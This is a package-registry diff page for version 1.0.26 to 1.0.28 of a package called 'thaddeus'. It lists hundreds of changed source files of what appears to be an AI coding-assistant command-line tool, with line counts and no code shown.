thaddeus 1.0.26 → 1.0.28

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Files changed (2082) hide show
  1. package/package.json +14 -5
  2. package/src/QueryEngine.js +926 -0
  3. package/src/Task.js +49 -0
  4. package/src/Tool.js +61 -0
  5. package/src/assistant/gate.js +5 -0
  6. package/src/assistant/index.js +106 -0
  7. package/src/assistant/sessionHistory.js +145 -0
  8. package/src/bootstrap/state.js +1163 -0
  9. package/src/bridge/bridgeApi.js +304 -0
  10. package/src/bridge/bridgeConfig.js +39 -0
  11. package/src/bridge/bridgeDebug.js +73 -0
  12. package/src/bridge/bridgeEnabled.js +185 -0
  13. package/src/bridge/bridgeMain.js +2289 -0
  14. package/src/bridge/bridgeMessaging.js +353 -0
  15. package/src/bridge/bridgePermissionCallbacks.js +10 -0
  16. package/src/bridge/bridgePointer.js +175 -0
  17. package/src/bridge/bridgeStatusUtil.js +105 -0
  18. package/src/bridge/bridgeUI.js +411 -0
  19. package/src/bridge/capacityWake.js +35 -0
  20. package/src/bridge/codeSessionApi.js +111 -0
  21. package/src/bridge/createSession.js +273 -0
  22. package/src/bridge/debugUtils.js +115 -0
  23. package/src/bridge/envLessBridgeConfig.js +120 -0
  24. package/src/bridge/flushGate.js +65 -0
  25. package/src/bridge/inboundAttachments.js +152 -0
  26. package/src/bridge/inboundMessages.js +63 -0
  27. package/src/bridge/initReplBridge.js +431 -0
  28. package/src/bridge/jwtUtils.js +185 -0
  29. package/src/bridge/peerSessions.js +5 -0
  30. package/src/bridge/pollConfig.js +85 -0
  31. package/src/bridge/pollConfigDefaults.js +62 -0
  32. package/src/bridge/remoteBridgeCore.js +712 -0
  33. package/src/bridge/replBridge.js +1719 -0
  34. package/src/bridge/replBridgeHandle.js +30 -0
  35. package/src/bridge/replBridgeTransport.js +236 -0
  36. package/src/bridge/sessionIdCompat.js +56 -0
  37. package/src/bridge/sessionRunner.js +421 -0
  38. package/src/bridge/trustedDevice.js +170 -0
  39. package/src/bridge/types.js +9 -0
  40. package/src/bridge/webhookSanitizer.js +6 -0
  41. package/src/bridge/workSecret.js +99 -0
  42. package/src/buddy/CompanionSprite.js +348 -0
  43. package/src/buddy/companion.js +107 -0
  44. package/src/buddy/prompt.js +33 -0
  45. package/src/buddy/sprites.js +488 -0
  46. package/src/buddy/types.js +90 -0
  47. package/src/buddy/useBuddyNotification.js +85 -0
  48. package/src/cli/bg.js +17 -0
  49. package/src/cli/exit.js +30 -0
  50. package/src/cli/handlers/agents.js +55 -0
  51. package/src/cli/handlers/auth.js +249 -0
  52. package/src/cli/handlers/autoMode.js +128 -0
  53. package/src/cli/handlers/mcp.js +335 -0
  54. package/src/cli/handlers/plugins.js +634 -0
  55. package/src/cli/handlers/templateJobs.js +19 -0
  56. package/src/cli/handlers/util.js +76 -0
  57. package/src/cli/ndjsonSafeStringify.js +27 -0
  58. package/src/cli/print.js +4294 -0
  59. package/src/cli/remoteIO.js +208 -0
  60. package/src/cli/structuredIO.js +644 -0
  61. package/src/cli/transports/HybridTransport.js +233 -0
  62. package/src/cli/transports/SSETransport.js +538 -0
  63. package/src/cli/transports/SerialBatchEventUploader.js +224 -0
  64. package/src/cli/transports/WebSocketTransport.js +613 -0
  65. package/src/cli/transports/WorkerStateUploader.js +88 -0
  66. package/src/cli/transports/ccrClient.js +711 -0
  67. package/src/cli/transports/transportUtils.js +39 -0
  68. package/src/cli/update.js +314 -0
  69. package/src/commandCenter/launch.js +39 -0
  70. package/src/commandCenter/phoneApi.js +168 -0
  71. package/src/commandCenter/phoneStore.js +159 -0
  72. package/src/commandCenter/reactorBus.js +130 -0
  73. package/src/commandCenter/server.js +288 -0
  74. package/src/commandCenter/server.ts +42 -7
  75. package/src/commandCenter/tunnel.js +199 -0
  76. package/src/commands/add-dir/add-dir.js +121 -0
  77. package/src/commands/add-dir/index.js +8 -0
  78. package/src/commands/add-dir/validation.js +76 -0
  79. package/src/commands/advisor.js +88 -0
  80. package/src/commands/agents/agents.js +10 -0
  81. package/src/commands/agents/index.js +7 -0
  82. package/src/commands/agents-platform/index.js +2 -0
  83. package/src/commands/assistant/index.js +86 -0
  84. package/src/commands/backup/index.js +31 -0
  85. package/src/commands/branch/branch.js +205 -0
  86. package/src/commands/branch/index.js +11 -0
  87. package/src/commands/bridge/bridge.js +513 -0
  88. package/src/commands/bridge/index.js +22 -0
  89. package/src/commands/bridge-kick.js +179 -0
  90. package/src/commands/brief.js +89 -0
  91. package/src/commands/btw/btw.js +235 -0
  92. package/src/commands/btw/index.js +9 -0
  93. package/src/commands/buddy/buddy.js +100 -0
  94. package/src/commands/buddy/index.js +11 -0
  95. package/src/commands/chrome/chrome.js +291 -0
  96. package/src/commands/chrome/index.js +10 -0
  97. package/src/commands/clear/caches.js +116 -0
  98. package/src/commands/clear/clear.js +5 -0
  99. package/src/commands/clear/conversation.js +189 -0
  100. package/src/commands/clear/index.js +9 -0
  101. package/src/commands/color/color.js +58 -0
  102. package/src/commands/color/index.js +9 -0
  103. package/src/commands/commit-push-pr.js +137 -0
  104. package/src/commands/commit.js +80 -0
  105. package/src/commands/compact/compact.js +194 -0
  106. package/src/commands/compact/index.js +11 -0
  107. package/src/commands/config/config.js +6 -0
  108. package/src/commands/config/index.js +8 -0
  109. package/src/commands/context/context-noninteractive.js +219 -0
  110. package/src/commands/context/context.js +45 -0
  111. package/src/commands/context/index.js +21 -0
  112. package/src/commands/coordinator.js +34 -0
  113. package/src/commands/copy/copy.js +366 -0
  114. package/src/commands/copy/index.js +7 -0
  115. package/src/commands/cost/cost.js +21 -0
  116. package/src/commands/cost/index.js +16 -0
  117. package/src/commands/createMovedToPluginCommand.js +33 -0
  118. package/src/commands/desktop/desktop.js +6 -0
  119. package/src/commands/desktop/index.js +22 -0
  120. package/src/commands/diff/diff.js +6 -0
  121. package/src/commands/diff/index.js +6 -0
  122. package/src/commands/doctor/doctor.js +6 -0
  123. package/src/commands/doctor/index.js +9 -0
  124. package/src/commands/effort/effort.js +166 -0
  125. package/src/commands/effort/index.js +11 -0
  126. package/src/commands/exit/exit.js +32 -0
  127. package/src/commands/exit/index.js +9 -0
  128. package/src/commands/export/export.js +87 -0
  129. package/src/commands/export/index.js +8 -0
  130. package/src/commands/extra-usage/extra-usage-core.js +99 -0
  131. package/src/commands/extra-usage/extra-usage-noninteractive.js +13 -0
  132. package/src/commands/extra-usage/extra-usage.js +15 -0
  133. package/src/commands/extra-usage/index.js +29 -0
  134. package/src/commands/fast/fast.js +276 -0
  135. package/src/commands/fast/index.js +19 -0
  136. package/src/commands/feedback/feedback.js +11 -0
  137. package/src/commands/feedback/index.js +20 -0
  138. package/src/commands/files/files.js +11 -0
  139. package/src/commands/files/index.js +9 -0
  140. package/src/commands/force-snip.js +19 -0
  141. package/src/commands/fork/index.js +67 -0
  142. package/src/commands/heapdump/heapdump.js +14 -0
  143. package/src/commands/heapdump/index.js +9 -0
  144. package/src/commands/help/help.js +6 -0
  145. package/src/commands/help/index.js +7 -0
  146. package/src/commands/hooks/hooks.js +12 -0
  147. package/src/commands/hooks/index.js +8 -0
  148. package/src/commands/ide/ide.js +615 -0
  149. package/src/commands/ide/index.js +8 -0
  150. package/src/commands/init-verifiers.js +258 -0
  151. package/src/commands/init.js +248 -0
  152. package/src/commands/insights.js +2554 -0
  153. package/src/commands/install-github-app/ApiKeyStep.js +230 -0
  154. package/src/commands/install-github-app/CheckExistingSecretStep.js +194 -0
  155. package/src/commands/install-github-app/CheckGitHubStep.js +16 -0
  156. package/src/commands/install-github-app/ChooseRepoStep.js +211 -0
  157. package/src/commands/install-github-app/CreatingStep.js +53 -0
  158. package/src/commands/install-github-app/ErrorStep.js +84 -0
  159. package/src/commands/install-github-app/ExistingWorkflowStep.js +105 -0
  160. package/src/commands/install-github-app/InstallAppStep.js +97 -0
  161. package/src/commands/install-github-app/OAuthFlowStep.js +190 -0
  162. package/src/commands/install-github-app/SuccessStep.js +94 -0
  163. package/src/commands/install-github-app/WarningsStep.js +71 -0
  164. package/src/commands/install-github-app/index.js +10 -0
  165. package/src/commands/install-github-app/install-github-app.js +593 -0
  166. package/src/commands/install-github-app/setupGitHubActions.js +227 -0
  167. package/src/commands/install-slack-app/index.js +9 -0
  168. package/src/commands/install-slack-app/install-slack-app.js +25 -0
  169. package/src/commands/install.js +198 -0
  170. package/src/commands/keybindings/index.js +10 -0
  171. package/src/commands/keybindings/keybindings.js +47 -0
  172. package/src/commands/login/index.js +21 -0
  173. package/src/commands/login/login.js +135 -0
  174. package/src/commands/logout/index.js +11 -0
  175. package/src/commands/logout/logout.js +75 -0
  176. package/src/commands/mcp/addCommand.js +183 -0
  177. package/src/commands/mcp/index.js +9 -0
  178. package/src/commands/mcp/mcp.js +78 -0
  179. package/src/commands/mcp/xaaIdpCommand.js +193 -0
  180. package/src/commands/memories/index.js +9 -0
  181. package/src/commands/memories/index.ts +12 -0
  182. package/src/commands/memories/memories.tsx +949 -0
  183. package/src/commands/memory/index.js +7 -0
  184. package/src/commands/memory/memory.js +71 -0
  185. package/src/commands/mobile/index.js +9 -0
  186. package/src/commands/mobile/mobile.js +279 -0
  187. package/src/commands/model/index.js +14 -0
  188. package/src/commands/model/model.js +284 -0
  189. package/src/commands/output-style/index.js +8 -0
  190. package/src/commands/output-style/output-style.js +6 -0
  191. package/src/commands/passes/index.js +17 -0
  192. package/src/commands/passes/passes.js +23 -0
  193. package/src/commands/peers/index.js +68 -0
  194. package/src/commands/permissions/index.js +8 -0
  195. package/src/commands/permissions/permissions.js +9 -0
  196. package/src/commands/plan/index.js +8 -0
  197. package/src/commands/plan/plan.js +116 -0
  198. package/src/commands/plugin/AddMarketplace.js +96 -0
  199. package/src/commands/plugin/BrowseMarketplace.js +582 -0
  200. package/src/commands/plugin/DiscoverPlugins.js +613 -0
  201. package/src/commands/plugin/ManageMarketplaces.js +583 -0
  202. package/src/commands/plugin/ManagePlugins.js +1783 -0
  203. package/src/commands/plugin/PluginErrors.js +124 -0
  204. package/src/commands/plugin/PluginOptionsDialog.js +367 -0
  205. package/src/commands/plugin/PluginOptionsFlow.js +97 -0
  206. package/src/commands/plugin/PluginSettings.js +1041 -0
  207. package/src/commands/plugin/PluginTrustWarning.js +35 -0
  208. package/src/commands/plugin/UnifiedInstalledCell.js +616 -0
  209. package/src/commands/plugin/ValidatePlugin.js +96 -0
  210. package/src/commands/plugin/index.js +10 -0
  211. package/src/commands/plugin/parseArgs.js +71 -0
  212. package/src/commands/plugin/plugin.js +6 -0
  213. package/src/commands/plugin/pluginDetailsHelpers.js +95 -0
  214. package/src/commands/plugin/usePagination.js +89 -0
  215. package/src/commands/pr_comments/index.js +49 -0
  216. package/src/commands/privacy-settings/index.js +11 -0
  217. package/src/commands/privacy-settings/privacy-settings.js +55 -0
  218. package/src/commands/proactive.js +29 -0
  219. package/src/commands/rate-limit-options/index.js +15 -0
  220. package/src/commands/rate-limit-options/rate-limit-options.js +213 -0
  221. package/src/commands/release-notes/index.js +8 -0
  222. package/src/commands/release-notes/release-notes.js +38 -0
  223. package/src/commands/reload-plugins/index.js +11 -0
  224. package/src/commands/reload-plugins/reload-plugins.js +52 -0
  225. package/src/commands/remote-env/index.js +12 -0
  226. package/src/commands/remote-env/remote-env.js +6 -0
  227. package/src/commands/remote-setup/api.js +155 -0
  228. package/src/commands/remote-setup/index.js +15 -0
  229. package/src/commands/remote-setup/remote-setup.js +150 -0
  230. package/src/commands/remoteControlServer/index.js +58 -0
  231. package/src/commands/rename/generateSessionName.js +58 -0
  232. package/src/commands/rename/index.js +9 -0
  233. package/src/commands/rename/rename.js +52 -0
  234. package/src/commands/resume/index.js +9 -0
  235. package/src/commands/resume/resume.js +239 -0
  236. package/src/commands/review/UltrareviewOverageDialog.js +97 -0
  237. package/src/commands/review/reviewRemote.js +259 -0
  238. package/src/commands/review/ultrareviewCommand.js +58 -0
  239. package/src/commands/review/ultrareviewEnabled.js +10 -0
  240. package/src/commands/review.js +53 -0
  241. package/src/commands/rewind/index.js +10 -0
  242. package/src/commands/rewind/rewind.js +7 -0
  243. package/src/commands/sandbox-toggle/index.js +41 -0
  244. package/src/commands/sandbox-toggle/sandbox-toggle.js +73 -0
  245. package/src/commands/security-review.js +231 -0
  246. package/src/commands/session/index.js +13 -0
  247. package/src/commands/session/session.js +143 -0
  248. package/src/commands/skills/index.js +7 -0
  249. package/src/commands/skills/skills.js +6 -0
  250. package/src/commands/speak.js +21 -0
  251. package/src/commands/start-business.js +1575 -0
  252. package/src/commands/start-business.ts +1581 -0
  253. package/src/commands/stats/index.js +7 -0
  254. package/src/commands/stats/stats.js +6 -0
  255. package/src/commands/status/index.js +8 -0
  256. package/src/commands/status/status.js +6 -0
  257. package/src/commands/statusline.js +22 -0
  258. package/src/commands/stickers/index.js +8 -0
  259. package/src/commands/stickers/stickers.js +14 -0
  260. package/src/commands/subscribe-pr.js +131 -0
  261. package/src/commands/tag/index.js +9 -0
  262. package/src/commands/tag/tag.js +215 -0
  263. package/src/commands/tasks/index.js +8 -0
  264. package/src/commands/tasks/tasks.js +6 -0
  265. package/src/commands/terminalSetup/index.js +18 -0
  266. package/src/commands/terminalSetup/terminalSetup.js +491 -0
  267. package/src/commands/thaddeus-usage/index.js +17 -0
  268. package/src/commands/theme/index.js +7 -0
  269. package/src/commands/theme/theme.js +51 -0
  270. package/src/commands/thinkback/index.js +9 -0
  271. package/src/commands/thinkback/thinkback.js +528 -0
  272. package/src/commands/thinkback-play/index.js +13 -0
  273. package/src/commands/thinkback-play/thinkback-play.js +34 -0
  274. package/src/commands/torch.js +122 -0
  275. package/src/commands/ultraplan.js +416 -0
  276. package/src/commands/upgrade/index.js +12 -0
  277. package/src/commands/upgrade/upgrade.js +38 -0
  278. package/src/commands/usage/index.js +7 -0
  279. package/src/commands/usage/usage.js +6 -0
  280. package/src/commands/version.js +17 -0
  281. package/src/commands/vim/index.js +8 -0
  282. package/src/commands/vim/vim.js +25 -0
  283. package/src/commands/voice/index.js +13 -0
  284. package/src/commands/voice/voice.js +44 -0
  285. package/src/commands/workflows/index.js +123 -0
  286. package/src/commands.js +614 -0
  287. package/src/commands.ts +4 -0
  288. package/src/components/AgentProgressLine.js +112 -0
  289. package/src/components/AntModelSwitchCallout.js +8 -0
  290. package/src/components/App.js +46 -0
  291. package/src/components/ApproveApiKey.js +125 -0
  292. package/src/components/AutoModeOptInDialog.js +140 -0
  293. package/src/components/AutoUpdater.js +156 -0
  294. package/src/components/AutoUpdaterWrapper.js +78 -0
  295. package/src/components/AwsAuthStatusBox.js +88 -0
  296. package/src/components/BaseTextInput.js +105 -0
  297. package/src/components/BashModeProgress.js +49 -0
  298. package/src/components/BridgeDialog.js +415 -0
  299. package/src/components/BypassPermissionsModeDialog.js +87 -0
  300. package/src/components/ChannelDowngradeDialog.js +101 -0
  301. package/src/components/ClaudeInChromeOnboarding.js +126 -0
  302. package/src/components/ClaudeMdExternalIncludesDialog.js +137 -0
  303. package/src/components/ClickableImageRef.js +65 -0
  304. package/src/components/CompactSummary.js +120 -0
  305. package/src/components/ConfigurableShortcutHint.js +35 -0
  306. package/src/components/ConsoleOAuthFlow.js +554 -0
  307. package/src/components/ContextSuggestions.js +44 -0
  308. package/src/components/ContextVisualization.js +482 -0
  309. package/src/components/CoordinatorAgentStatus.js +261 -0
  310. package/src/components/CostThresholdDialog.js +49 -0
  311. package/src/components/CtrlOToExpand.js +50 -0
  312. package/src/components/CustomSelect/SelectMulti.js +150 -0
  313. package/src/components/CustomSelect/index.js +2 -0
  314. package/src/components/CustomSelect/option-map.js +32 -0
  315. package/src/components/CustomSelect/select-input-option.js +426 -0
  316. package/src/components/CustomSelect/select-option.js +24 -0
  317. package/src/components/CustomSelect/select.js +518 -0
  318. package/src/components/CustomSelect/use-multi-select-state.js +214 -0
  319. package/src/components/CustomSelect/use-select-input.js +170 -0
  320. package/src/components/CustomSelect/use-select-navigation.js +366 -0
  321. package/src/components/CustomSelect/use-select-state.js +22 -0
  322. package/src/components/DesktopHandoff.js +195 -0
  323. package/src/components/DesktopUpsell/DesktopUpsellStartup.js +174 -0
  324. package/src/components/DevBar.js +51 -0
  325. package/src/components/DevChannelsDialog.js +104 -0
  326. package/src/components/DiagnosticsDisplay.js +91 -0
  327. package/src/components/EffortCallout.js +264 -0
  328. package/src/components/EffortIndicator.js +28 -0
  329. package/src/components/ExitFlow.js +41 -0
  330. package/src/components/ExportDialog.js +101 -0
  331. package/src/components/FallbackToolUseErrorMessage.js +116 -0
  332. package/src/components/FallbackToolUseRejectedMessage.js +17 -0
  333. package/src/components/FastIcon.js +43 -0
  334. package/src/components/Feedback.js +369 -0
  335. package/src/components/FeedbackSurvey/FeedbackSurvey.js +151 -0
  336. package/src/components/FeedbackSurvey/FeedbackSurveyView.js +104 -0
  337. package/src/components/FeedbackSurvey/TranscriptSharePrompt.js +84 -0
  338. package/src/components/FeedbackSurvey/submitTranscriptShare.js +10 -0
  339. package/src/components/FeedbackSurvey/useDebouncedDigitInput.js +51 -0
  340. package/src/components/FeedbackSurvey/useFeedbackSurvey.js +258 -0
  341. package/src/components/FeedbackSurvey/useFrustrationDetection.js +8 -0
  342. package/src/components/FeedbackSurvey/useMemorySurvey.js +191 -0
  343. package/src/components/FeedbackSurvey/usePostCompactSurvey.js +202 -0
  344. package/src/components/FeedbackSurvey/useSurveyState.js +80 -0
  345. package/src/components/FileEditToolDiff.js +167 -0
  346. package/src/components/FileEditToolUpdatedMessage.js +112 -0
  347. package/src/components/FileEditToolUseRejectedMessage.js +158 -0
  348. package/src/components/FilePathLink.js +35 -0
  349. package/src/components/FullscreenLayout.js +578 -0
  350. package/src/components/GlobalSearchDialog.js +340 -0
  351. package/src/components/HelpV2/Commands.js +66 -0
  352. package/src/components/HelpV2/General.js +25 -0
  353. package/src/components/HelpV2/HelpV2.js +186 -0
  354. package/src/components/HighlightedCode/Fallback.js +193 -0
  355. package/src/components/HighlightedCode.js +185 -0
  356. package/src/components/HistorySearchDialog.js +93 -0
  357. package/src/components/IdeAutoConnectDialog.js +154 -0
  358. package/src/components/IdeOnboardingDialog.js +175 -0
  359. package/src/components/IdeStatusIndicator.js +50 -0
  360. package/src/components/IdleReturnDialog.js +117 -0
  361. package/src/components/InterruptedByUser.js +16 -0
  362. package/src/components/InvalidConfigDialog.js +135 -0
  363. package/src/components/InvalidSettingsDialog.js +85 -0
  364. package/src/components/KeybindingWarnings.js +55 -0
  365. package/src/components/LanguagePicker.js +84 -0
  366. package/src/components/LogSelector.js +1579 -0
  367. package/src/components/LogoV2/AnimatedAsterisk.js +43 -0
  368. package/src/components/LogoV2/AnimatedClawd.js +64 -0
  369. package/src/components/LogoV2/ChannelsNotice.js +262 -0
  370. package/src/components/LogoV2/Clawd.js +33 -0
  371. package/src/components/LogoV2/CondensedLogo.js +160 -0
  372. package/src/components/LogoV2/EmergencyTip.js +48 -0
  373. package/src/components/LogoV2/Feed.js +85 -0
  374. package/src/components/LogoV2/FeedColumn.js +55 -0
  375. package/src/components/LogoV2/GuestPassesUpsell.js +71 -0
  376. package/src/components/LogoV2/LogoV2.js +565 -0
  377. package/src/components/LogoV2/Opus1mMergeNotice.js +57 -0
  378. package/src/components/LogoV2/OverageCreditUpsell.js +161 -0
  379. package/src/components/LogoV2/VoiceModeNotice.js +71 -0
  380. package/src/components/LogoV2/WelcomeV2.js +14 -0
  381. package/src/components/LogoV2/feedConfigs.js +79 -0
  382. package/src/components/LspRecommendation/LspRecommendationMenu.js +46 -0
  383. package/src/components/MCPServerApprovalDialog.js +114 -0
  384. package/src/components/MCPServerDesktopImportDialog.js +206 -0
  385. package/src/components/MCPServerDialogCopy.js +16 -0
  386. package/src/components/MCPServerMultiselectDialog.js +134 -0
  387. package/src/components/ManagedSettingsSecurityDialog/ManagedSettingsSecurityDialog.js +150 -0
  388. package/src/components/ManagedSettingsSecurityDialog/utils.js +105 -0
  389. package/src/components/Markdown.js +233 -0
  390. package/src/components/MarkdownTable.js +280 -0
  391. package/src/components/MemoryUsageIndicator.js +28 -0
  392. package/src/components/Message.js +564 -0
  393. package/src/components/MessageModel.js +37 -0
  394. package/src/components/MessageResponse.js +73 -0
  395. package/src/components/MessageRow.js +346 -0
  396. package/src/components/MessageSelector.js +744 -0
  397. package/src/components/MessageTimestamp.js +58 -0
  398. package/src/components/Messages.js +645 -0
  399. package/src/components/ModelPicker.js +452 -0
  400. package/src/components/NativeAutoUpdater.js +152 -0
  401. package/src/components/NotebookEditToolUseRejectedMessage.js +84 -0
  402. package/src/components/OffscreenFreeze.js +35 -0
  403. package/src/components/Onboarding.js +174 -0
  404. package/src/components/OutputStylePicker.js +103 -0
  405. package/src/components/PackageManagerAutoUpdater.js +99 -0
  406. package/src/components/Passes/Passes.js +114 -0
  407. package/src/components/PrBadge.js +91 -0
  408. package/src/components/PressEnterToContinue.js +16 -0
  409. package/src/components/PromptInput/HistorySearchInput.js +45 -0
  410. package/src/components/PromptInput/IssueFlagBanner.js +8 -0
  411. package/src/components/PromptInput/Notifications.js +220 -0
  412. package/src/components/PromptInput/PromptInput.js +2014 -0
  413. package/src/components/PromptInput/PromptInputFooter.js +85 -0
  414. package/src/components/PromptInput/PromptInputFooterLeftSide.js +408 -0
  415. package/src/components/PromptInput/PromptInputFooterSuggestions.js +281 -0
  416. package/src/components/PromptInput/PromptInputHelpMenu.js +380 -0
  417. package/src/components/PromptInput/PromptInputModeIndicator.js +73 -0
  418. package/src/components/PromptInput/PromptInputQueuedCommands.js +105 -0
  419. package/src/components/PromptInput/PromptInputStashNotice.js +21 -0
  420. package/src/components/PromptInput/SandboxPromptFooterHint.js +66 -0
  421. package/src/components/PromptInput/ShimmeredInput.js +133 -0
  422. package/src/components/PromptInput/VoiceIndicator.js +137 -0
  423. package/src/components/PromptInput/inputModes.js +24 -0
  424. package/src/components/PromptInput/inputPaste.js +62 -0
  425. package/src/components/PromptInput/useMaybeTruncateInput.js +33 -0
  426. package/src/components/PromptInput/usePromptInputPlaceholder.js +53 -0
  427. package/src/components/PromptInput/useShowFastIconHint.js +23 -0
  428. package/src/components/PromptInput/useSwarmBanner.js +112 -0
  429. package/src/components/PromptInput/utils.js +50 -0
  430. package/src/components/QuickOpenDialog.js +244 -0
  431. package/src/components/RemoteCallout.js +53 -0
  432. package/src/components/RemoteEnvironmentDialog.js +346 -0
  433. package/src/components/ResumeTask.js +173 -0
  434. package/src/components/SandboxViolationExpandedView.js +106 -0
  435. package/src/components/ScrollKeybindingHandler.js +982 -0
  436. package/src/components/SearchBox.js +56 -0
  437. package/src/components/SentryErrorBoundary.js +16 -0
  438. package/src/components/SessionBackgroundHint.js +105 -0
  439. package/src/components/SessionPreview.js +200 -0
  440. package/src/components/Settings/Config.js +1626 -0
  441. package/src/components/Settings/Settings.js +131 -0
  442. package/src/components/Settings/Status.js +230 -0
  443. package/src/components/Settings/Usage.js +341 -0
  444. package/src/components/ShowInIDEPrompt.js +152 -0
  445. package/src/components/SkillImprovementSurvey.js +130 -0
  446. package/src/components/Spinner/FlashingChar.js +52 -0
  447. package/src/components/Spinner/GlimmerMessage.js +329 -0
  448. package/src/components/Spinner/ShimmerChar.js +23 -0
  449. package/src/components/Spinner/SpinnerAnimationRow.js +170 -0
  450. package/src/components/Spinner/SpinnerGlyph.js +70 -0
  451. package/src/components/Spinner/TeammateSpinnerLine.js +171 -0
  452. package/src/components/Spinner/TeammateSpinnerTree.js +269 -0
  453. package/src/components/Spinner/index.js +9 -0
  454. package/src/components/Spinner/teammateSelectHint.js +1 -0
  455. package/src/components/Spinner/useShimmerAnimation.js +22 -0
  456. package/src/components/Spinner/useStalledAnimation.js +63 -0
  457. package/src/components/Spinner/utils.js +78 -0
  458. package/src/components/Spinner.js +474 -0
  459. package/src/components/Stats.js +1000 -0
  460. package/src/components/StatusLine.js +286 -0
  461. package/src/components/StatusNotices.js +50 -0
  462. package/src/components/StructuredDiff/Fallback.js +336 -0
  463. package/src/components/StructuredDiff/colorDiff.js +37 -0
  464. package/src/components/StructuredDiff.js +153 -0
  465. package/src/components/StructuredDiffList.js +9 -0
  466. package/src/components/TagTabs.js +101 -0
  467. package/src/components/TaskListV2.js +333 -0
  468. package/src/components/TeammateViewHeader.js +88 -0
  469. package/src/components/TeleportError.js +191 -0
  470. package/src/components/TeleportProgress.js +131 -0
  471. package/src/components/TeleportRepoMismatchDialog.js +98 -0
  472. package/src/components/TeleportResumeWrapper.js +158 -0
  473. package/src/components/TeleportStash.js +82 -0
  474. package/src/components/TextInput.js +108 -0
  475. package/src/components/ThaddeusHint/PluginHintMenu.js +37 -0
  476. package/src/components/ThemePicker.js +331 -0
  477. package/src/components/ThinkingToggle.js +154 -0
  478. package/src/components/TokenWarning.js +171 -0
  479. package/src/components/ToolUseLoader.js +35 -0
  480. package/src/components/TrustDialog/TrustDialog.js +301 -0
  481. package/src/components/TrustDialog/utils.js +199 -0
  482. package/src/components/UndercoverAutoCallout.js +5 -0
  483. package/src/components/ValidationErrorsList.js +147 -0
  484. package/src/components/VimTextInput.js +136 -0
  485. package/src/components/VirtualMessageList.js +893 -0
  486. package/src/components/WorkflowMultiselectDialog.js +118 -0
  487. package/src/components/WorktreeExitDialog.js +220 -0
  488. package/src/components/agents/AgentDetail.js +227 -0
  489. package/src/components/agents/AgentEditor.js +147 -0
  490. package/src/components/agents/AgentNavigationFooter.js +22 -0
  491. package/src/components/agents/AgentsList.js +436 -0
  492. package/src/components/agents/AgentsMenu.js +849 -0
  493. package/src/components/agents/ColorPicker.js +110 -0
  494. package/src/components/agents/ModelSelector.js +63 -0
  495. package/src/components/agents/SnapshotUpdateDialog.js +14 -0
  496. package/src/components/agents/ToolSelector.js +557 -0
  497. package/src/components/agents/agentFileUtils.js +179 -0
  498. package/src/components/agents/generateAgent.js +161 -0
  499. package/src/components/agents/new-agent-creation/CreateAgentWizard.js +89 -0
  500. package/src/components/agents/new-agent-creation/wizard-steps/ColorStep.js +81 -0
  501. package/src/components/agents/new-agent-creation/wizard-steps/ConfirmStep.js +387 -0
  502. package/src/components/agents/new-agent-creation/wizard-steps/ConfirmStepWrapper.js +63 -0
  503. package/src/components/agents/new-agent-creation/wizard-steps/DescriptionStep.js +126 -0
  504. package/src/components/agents/new-agent-creation/wizard-steps/GenerateStep.js +118 -0
  505. package/src/components/agents/new-agent-creation/wizard-steps/LocationStep.js +80 -0
  506. package/src/components/agents/new-agent-creation/wizard-steps/MemoryStep.js +108 -0
  507. package/src/components/agents/new-agent-creation/wizard-steps/MethodStep.js +80 -0
  508. package/src/components/agents/new-agent-creation/wizard-steps/ModelStep.js +49 -0
  509. package/src/components/agents/new-agent-creation/wizard-steps/PromptStep.js +131 -0
  510. package/src/components/agents/new-agent-creation/wizard-steps/ToolsStep.js +52 -0
  511. package/src/components/agents/new-agent-creation/wizard-steps/TypeStep.js +100 -0
  512. package/src/components/agents/types.js +4 -0
  513. package/src/components/agents/utils.js +14 -0
  514. package/src/components/agents/validateAgent.js +79 -0
  515. package/src/components/design-system/Byline.js +72 -0
  516. package/src/components/design-system/Dialog.js +117 -0
  517. package/src/components/design-system/Divider.js +110 -0
  518. package/src/components/design-system/FuzzyPicker.js +191 -0
  519. package/src/components/design-system/KeyboardShortcutHint.js +68 -0
  520. package/src/components/design-system/ListItem.js +184 -0
  521. package/src/components/design-system/LoadingState.js +69 -0
  522. package/src/components/design-system/Pane.js +69 -0
  523. package/src/components/design-system/ProgressBar.js +63 -0
  524. package/src/components/design-system/Ratchet.js +71 -0
  525. package/src/components/design-system/StatusIcon.js +70 -0
  526. package/src/components/design-system/Tabs.js +269 -0
  527. package/src/components/design-system/ThemeProvider.js +137 -0
  528. package/src/components/design-system/ThemedBox.js +126 -0
  529. package/src/components/design-system/ThemedText.js +60 -0
  530. package/src/components/design-system/color.js +22 -0
  531. package/src/components/diff/DiffDetailView.js +285 -0
  532. package/src/components/diff/DiffDialog.js +387 -0
  533. package/src/components/diff/DiffFileList.js +292 -0
  534. package/src/components/grove/Grove.js +483 -0
  535. package/src/components/hooks/HooksConfigMenu.js +583 -0
  536. package/src/components/hooks/PromptDialog.js +82 -0
  537. package/src/components/hooks/SelectEventMode.js +118 -0
  538. package/src/components/hooks/SelectHookMode.js +101 -0
  539. package/src/components/hooks/SelectMatcherMode.js +131 -0
  540. package/src/components/hooks/ViewHookMode.js +204 -0
  541. package/src/components/mcp/CapabilitiesSection.js +56 -0
  542. package/src/components/mcp/ElicitationDialog.js +945 -0
  543. package/src/components/mcp/MCPAgentServerMenu.js +95 -0
  544. package/src/components/mcp/MCPListPanel.js +505 -0
  545. package/src/components/mcp/MCPReconnect.js +168 -0
  546. package/src/components/mcp/MCPRemoteServerMenu.js +460 -0
  547. package/src/components/mcp/MCPSettings.js +414 -0
  548. package/src/components/mcp/MCPStdioServerMenu.js +95 -0
  549. package/src/components/mcp/MCPToolDetailView.js +219 -0
  550. package/src/components/mcp/MCPToolListView.js +137 -0
  551. package/src/components/mcp/McpParsingWarnings.js +212 -0
  552. package/src/components/mcp/index.js +8 -0
  553. package/src/components/mcp/utils/reconnectHelpers.js +35 -0
  554. package/src/components/memory/MemoryFileSelector.js +454 -0
  555. package/src/components/memory/MemoryUpdateNotification.js +43 -0
  556. package/src/components/messageActions.js +418 -0
  557. package/src/components/messages/AdvisorMessage.js +152 -0
  558. package/src/components/messages/AssistantRedactedThinkingMessage.js +28 -0
  559. package/src/components/messages/AssistantTextMessage.js +287 -0
  560. package/src/components/messages/AssistantThinkingMessage.js +70 -0
  561. package/src/components/messages/AssistantToolUseMessage.js +324 -0
  562. package/src/components/messages/AttachmentMessage.js +418 -0
